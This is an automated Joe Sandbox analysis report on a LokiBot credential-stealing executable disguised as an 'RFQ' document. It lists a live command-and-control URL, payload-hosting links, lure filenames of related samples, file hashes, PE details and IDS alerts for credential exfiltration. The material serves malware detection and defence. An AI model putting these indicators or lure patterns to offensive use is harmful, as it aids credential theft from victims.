http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
googlehosted.l.googleusercontent.com	142.250.201.193	true	false		high
doc-14-7g-docs.googleusercontent.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://63.141.228.141/32.php/nuldTOn9SBn3G	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://doc-14-7g-docs.googleusercontent.com/ytq	RFQ No3756368.exe, 00000002.00000002.811546103.0000000000948000.00000004.00000020.sdmp	false		high
http://pki.goog/gsr2/GTS1O1.crt0	RFQ No3756368.exe, 00000002.00000002.811546103.0000000000948000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.pki.goog/gsr2/gsr2.crl0?	RFQ No3756368.exe, 00000002.00000002.811588234.0000000000965000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://doc-14-7g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9u2nstv2	RFQ No3756368.exe, 00000002.00000002.811546103.0000000000948000.00000004.00000020.sdmp, RFQ No3756368.exe, 00000002.00000002.811588234.0000000000965000.00000004.00000020.sdmp	false		high
https://pki.goog/repository/0	RFQ No3756368.exe, 00000002.00000002.811588234.0000000000965000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://doc-14-7g-docs.googleusercontent.com/	RFQ No3756368.exe, 00000002.00000002.811546103.0000000000948000.00000004.00000020.sdmp	false		high
http://crl.pki.goog/GTS1O1core.crl0	RFQ No3756368.exe, 00000002.00000002.811546103.0000000000948000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
142.250.201.193	googlehosted.l.googleusercontent.com	United States		15169	GOOGLEUS	false
63.141.228.141	unknown	United States		33387	NOCIXUS	true

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	434725
Start date:	15.06.2021
Start time:	13:01:16
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 38s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	RFQ No3756368.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@3/2@1/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 1.7% (good quality ratio 0.4%) Quality average: 18.8% Quality standard deviation: 29.8%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Stop behavior analysis, all processes terminated
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 52.147.198.201, 13.88.21.125, 20.82.209.183, 8.241.90.254, 8.241.89.254, 8.238.30.126, 8.241.126.121, 8.241.90.126, 23.55.161.163, 23.55.161.152, 142.250.201.206 Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus16.cloudapp.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, drive.google.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, skypedataprdcolwus15.cloudapp.net, au-bg-shim.trafficmanager.net Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:03:20	API Interceptor	1x Sleep call for process: RFQ No3756368.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
63.141.228.141	Proforma Invoice.exe	Get hash	malicious	Browse	63.141.228.141/32.php/cViU8nooOLcrF
	DHL Receipt_AWB#600595460.exe	Get hash	malicious	Browse	63.141.228.141/32.php/tv9F9tOWmL3Dq
	TDF9XB01IbjiGuv.exe	Get hash	malicious	Browse	63.141.228.141/32.php/qB0GQ2GKLyuOU
	quote.exe	Get hash	malicious	Browse	63.141.228.141/32.php/GsoXa3yQ3p8IH
	Zahtjev za ponudu 15#U00b706#U00b72021#U00b7pdf.exe	Get hash	malicious	Browse	63.141.228.141/32.php/S7zr5v1fXI3Rb
	#U00c1raj#U00e1nlat k#U00e9r#U00e9se 15#U00b706#U00b72021#U00b7pdf.exe	Get hash	malicious	Browse	63.141.228.141/32.php/S7zr5v1fXI3Rb
	Cerere de oferta 15#U00b706#U00b72021#U00b7pdf.exe	Get hash	malicious	Browse	63.141.228.141/32.php/S7zr5v1fXI3Rb
	jO8Tn2nYdJ.exe	Get hash	malicious	Browse	63.141.228.141/32.php/3LJAZguIGMmJV
	socdkv9RSS.exe	Get hash	malicious	Browse	63.141.228.141/32.php/3bi7icv31dccw
	Estatment.exe	Get hash	malicious	Browse	63.141.228.141/32.php/5l0ZnNa7AB6Dl
	Proforma_Valid_Prices_Order no.0193884_doc.exe	Get hash	malicious	Browse	63.141.228.141/32.php/3LJAZguIGMmJV
	SecuriteInfo.com.Variant.MSILHeracles.18248.31707.exe	Get hash	malicious	Browse	63.141.228.141/32.php/NtbXO1knHRe3C
	TNT Shipment Documents.exe	Get hash	malicious	Browse	63.141.228.141/32.php/tv9F9tOWmL3Dq
	QUOTE 1B001.exe	Get hash	malicious	Browse	63.141.228.141/32.php/cUubrzlDZTTbS
	DOC.022000109530000.pdf.exe	Get hash	malicious	Browse	63.141.228.141/32.php/fw2pM7fnRpMCI
	detalles de la transferencia.pdf.exe	Get hash	malicious	Browse	63.141.228.141/32.php/fw2pM7fnRpMCI
	XpQz54zQrMpkJxs.exe	Get hash	malicious	Browse	63.141.228.141/32.php/NtbXO1knHRe3C
	DxMkM6DOH7.exe	Get hash	malicious	Browse	63.141.228.141/32.php/kMB4F28c3jZI6
	Detalles del pago.pdf.exe	Get hash	malicious	Browse	63.141.228.141/32.php/nPQcl6eLQb1MW
	Hu4JBGUQLs7Xh7q.exe	Get hash	malicious	Browse	63.141.228.141/32.php/nPQcl6eLQb1MW

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
NOCIXUS	Proforma Invoice.exe	Get hash	malicious	Browse	63.141.228.141
	DHL Receipt_AWB#600595460.exe	Get hash	malicious	Browse	63.141.228.141
	TDF9XB01IbjiGuv.exe	Get hash	malicious	Browse	63.141.228.141
	invoice_sh.html	Get hash	malicious	Browse	63.141.243.99
	quote.exe	Get hash	malicious	Browse	63.141.228.141
	Zahtjev za ponudu 15#U00b706#U00b72021#U00b7pdf.exe	Get hash	malicious	Browse	63.141.228.141
	#U00c1raj#U00e1nlat k#U00e9r#U00e9se 15#U00b706#U00b72021#U00b7pdf.exe	Get hash	malicious	Browse	63.141.228.141
	Cerere de oferta 15#U00b706#U00b72021#U00b7pdf.exe	Get hash	malicious	Browse	63.141.228.141
	jO8Tn2nYdJ.exe	Get hash	malicious	Browse	63.141.228.141
	socdkv9RSS.exe	Get hash	malicious	Browse	63.141.228.141
	Estatment.exe	Get hash	malicious	Browse	63.141.228.141
	Proforma_Valid_Prices_Order no.0193884_doc.exe	Get hash	malicious	Browse	63.141.228.141
	SecuriteInfo.com.Variant.MSILHeracles.18248.31707.exe	Get hash	malicious	Browse	63.141.228.141
	TNT Shipment Documents.exe	Get hash	malicious	Browse	63.141.228.141
	QUOTE 1B001.exe	Get hash	malicious	Browse	63.141.228.141
	DOC.022000109530000.pdf.exe	Get hash	malicious	Browse	63.141.228.141
	detalles de la transferencia.pdf.exe	Get hash	malicious	Browse	63.141.228.141
	XpQz54zQrMpkJxs.exe	Get hash	malicious	Browse	63.141.228.141
	DxMkM6DOH7.exe	Get hash	malicious	Browse	63.141.228.141
	Detalles del pago.pdf.exe	Get hash	malicious	Browse	63.141.228.141

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	IFS PO#268731 RFQ NEW IFS PO#268731.exe	Get hash	malicious	Browse	142.250.201.193
	hG6FzLXtsf.xls	Get hash	malicious	Browse	142.250.201.193
	documentation_71202.xlsb	Get hash	malicious	Browse	142.250.201.193
	invoice_sh.html	Get hash	malicious	Browse	142.250.201.193
	PO094638.exe	Get hash	malicious	Browse	142.250.201.193
	P0fhg2Duqa.xls	Get hash	malicious	Browse	142.250.201.193
	7#U1d05.html	Get hash	malicious	Browse	142.250.201.193
	FJsHsTO148.xls	Get hash	malicious	Browse	142.250.201.193
	psaPr187eJ.xls	Get hash	malicious	Browse	142.250.201.193
	DHL_SHIPMENT_NOTICE#6142020_Signed_.exe	Get hash	malicious	Browse	142.250.201.193
	GENERAL DYNAMICS_WlRE_REMITTANCE.xlsx	Get hash	malicious	Browse	142.250.201.193
	GENERAL DYNAMICS_WlRE_REMITTANCE_virus_scan.xlsx	Get hash	malicious	Browse	142.250.201.193
	May Release Check #39733.html	Get hash	malicious	Browse	142.250.201.193
	tender-461487493.xlsb	Get hash	malicious	Browse	142.250.201.193
	Sifaris siyah#U0131s#U0131. Sitat.exe	Get hash	malicious	Browse	142.250.201.193
	MV4WSB1Wje.exe	Get hash	malicious	Browse	142.250.201.193
	ILlLrEtVb1.exe	Get hash	malicious	Browse	142.250.201.193
	GaUJ2oJBUY.exe	Get hash	malicious	Browse	142.250.201.193
	y74H7ek2rC.exe	Get hash	malicious	Browse	142.250.201.193
	MoDLWYDM3Z.exe	Get hash	malicious	Browse	142.250.201.193

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck Download File
Process:	C:\Users\user\Desktop\RFQ No3756368.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\bc49718863ee53e026d805ec372039e9_d06ed635-68f6-4e9a-955c-4899f5f57b9a Download File
Process:	C:\Users\user\Desktop\RFQ No3756368.exe
File Type:	data
Category:	dropped
Size (bytes):	598
Entropy (8bit):	0.6390116820665388
Encrypted:	false
SSDEEP:	3:/lbel/lllbel/lllbel/lllbel/lllbel/lllbel/lllbq:4/g/g/g/g/g/g
MD5:	80F54DC1616678F37E478AC064CEC423
SHA1:	B8DB85EC31702B48B95A727092A38B446360FCA7
SHA-256:	A3AD19CA6EA04695FCD30034EAF389235385F3FA283837316916AF0CDA09DCC0
SHA-512:	6B3595E6C9B1EF62BBF5FA5716AFC09CF5025FB3E8B8906B773B37AE0EB6DB10A3DBC0392E681D9DDA72EDF6FB357679F9E2BC06B7857B11083A916FE0A2DEE5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	........................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.......................................................................................user.

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	4.6757788357261525
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	RFQ No3756368.exe
File size:	143360
MD5:	ce51f15d31008c3606729b00036fe841
SHA1:	9ed0987c6a26f61afb6fa772dce9b4a6ddd9090c
SHA256:	e4effdebb79bd1b3d2e3a2510a96f44cbf9ca4961340c7ca1f276bd3c527afb2
SHA512:	a0c1b0550caea00022225920679a7642e08aaaa9d5c8b6ade1cbd192a37980129aa751d7e1fcdc51d6774461f4223d19d6b4959c9da0e6acab9b858f41e08da0
SSDEEP:	1536:hCcQYhjIXnSCSv+0fYB8C0By866sqptPDe9bHE+ksxuBv:YcDgC5fYSCA7De94n
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L....{.`.....................0......,.............@................

File Icon


Icon Hash:	20047c7c70f0e004

Static PE Info

General
Entrypoint:	0x40142c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x60C87B09 [Tue Jun 15 10:03:53 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	646b0badad20ba025cd8fef6f59a6973

Entrypoint Preview

Instruction
push 00401670h
call 00007F60E0B80475h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
cmp byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
in al, dx
mul dword ptr [edi-3Ch]
inc ecx
jnc 00007F60E0B804A3h
inc ebp
test eax, 67DFB4F5h
int3
mov eax, dword ptr [00000080h]
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [ecx+00h], al
xchg byte ptr [eax-7Eh], dl
add dword ptr [ebp+esi*2+66h], edx
popad
add byte ptr [esi+00000060h], ah
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
or al, cl
stosb
or al, DEh
push esi
jnp 000004CEh
mov dl, 5Fh
in eax, 2Ch
jns 00007F60E0B8046Dh
jnbe 00007F60E0B804BEh
xchg edi, ebp
dec ebx
xchg eax, ecx
inc dword ptr [edi]
or byte ptr [edi-65h], al
out dx, al
jmp far 3A4Fh : F419DFA8h
dec edi
lodsd
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
mov al, byte ptr [5A000001h]
add byte ptr [eax], al
add byte ptr [eax], al
or byte ptr [eax], al
push esi
inc ecx
dec ebp
push eax
dec eax
dec edi
push edx
dec esi
add byte ptr [45001201h], cl
dec esp
inc ebp
inc ebx
push esp
push edx
dec edi
inc esp
dec ecx
push ebx
push ebx
dec edi
dec esp
push ebp

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x20894	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x23000	0x9bc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x12c	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1fdc8	0x20000	False	0.342445373535	data	4.92996328226	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x21000	0x12a0	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x23000	0x9bc	0x1000	False	0.178466796875	data	2.12743222651	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x2388c	0x130	data
RT_ICON	0x235a4	0x2e8	data
RT_ICON	0x2347c	0x128	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x2344c	0x30	data
RT_VERSION	0x23150	0x2fc	data	Sesotho (Sutu)	South Africa

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaAryMove, __vbaStrVarMove, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, __vbaLenBstrB, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaVarTstLt, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaObjVar, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaFileOpen, __vbaNew2, __vbaInStr, __vbaVar2Vec, __vbaR8Str, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarAdd, __vbaVarDup, __vbaStrToAnsi, __vbaFpI4, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0430 0x04b0
LegalCopyright	Atlassian
InternalName	Stenrkens6
FileVersion	1.00
CompanyName	Atlassian
LegalTrademarks	Atlassian
Comments	Atlassian
ProductName	Atlassian
ProductVersion	1.00
FileDescription	Atlassian
OriginalFilename	Stenrkens6.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
Sesotho (Sutu)	South Africa

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
06/15/21-13:03:17.644850	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49756	80	192.168.2.4	63.141.228.141
06/15/21-13:03:17.644850	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49756	80	192.168.2.4	63.141.228.141
06/15/21-13:03:17.644850	TCP	2025381	ET TROJAN LokiBot Checkin	49756	80	192.168.2.4	63.141.228.141
06/15/21-13:03:17.644850	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49756	80	192.168.2.4	63.141.228.141
06/15/21-13:03:18.762554	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49757	80	192.168.2.4	63.141.228.141
06/15/21-13:03:18.762554	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49757	80	192.168.2.4	63.141.228.141
06/15/21-13:03:18.762554	TCP	2025381	ET TROJAN LokiBot Checkin	49757	80	192.168.2.4	63.141.228.141
06/15/21-13:03:18.762554	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49757	80	192.168.2.4	63.141.228.141
06/15/21-13:03:19.780968	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49758	80	192.168.2.4	63.141.228.141
06/15/21-13:03:19.780968	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49758	80	192.168.2.4	63.141.228.141
06/15/21-13:03:19.780968	TCP	2025381	ET TROJAN LokiBot Checkin	49758	80	192.168.2.4	63.141.228.141
06/15/21-13:03:19.780968	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49758	80	192.168.2.4	63.141.228.141
06/15/21-13:03:20.825253	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49759	80	192.168.2.4	63.141.228.141
06/15/21-13:03:20.825253	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49759	80	192.168.2.4	63.141.228.141
06/15/21-13:03:20.825253	TCP	2025381	ET TROJAN LokiBot Checkin	49759	80	192.168.2.4	63.141.228.141
06/15/21-13:03:20.825253	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49759	80	192.168.2.4	63.141.228.141

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 15, 2021 13:03:14.421397924 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.496643066 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.496814013 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.497389078 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.535590887 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.556241035 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.556273937 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.556294918 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.556314945 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.556324959 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.556330919 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.556426048 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.556438923 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.571981907 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.610368967 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.610610008 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.611987114 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.655603886 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.854165077 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.854201078 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.854219913 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.854239941 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.854259968 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.854324102 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.855236053 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.856869936 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.856897116 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.857312918 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.859667063 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.859697104 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.859802961 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.862095118 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.862137079 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.862612009 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.864809990 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.864830017 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.866163969 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.866955996 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.866976023 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.867161989 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.869709015 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.870167017 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.892432928 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.892457962 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.892595053 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.892620087 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.893702984 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.893722057 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.893893957 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.896390915 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.896413088 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.896787882 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.899058104 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.899085045 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.899775982 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.901745081 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.901772976 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.901890039 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.901905060 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.904418945 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.904454947 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.904582024 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.904598951 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.907315969 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.907340050 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.907490969 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.909925938 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.909950972 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.912667990 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.912691116 CEST	443	49755	142.250.201.193	192.168.2.4
Jun 15, 2021 13:03:15.912796021 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.912816048 CEST	49755	443	192.168.2.4	142.250.201.193
Jun 15, 2021 13:03:15.915002108 CEST	443	49755	142.250.201.193	192.168.2.4
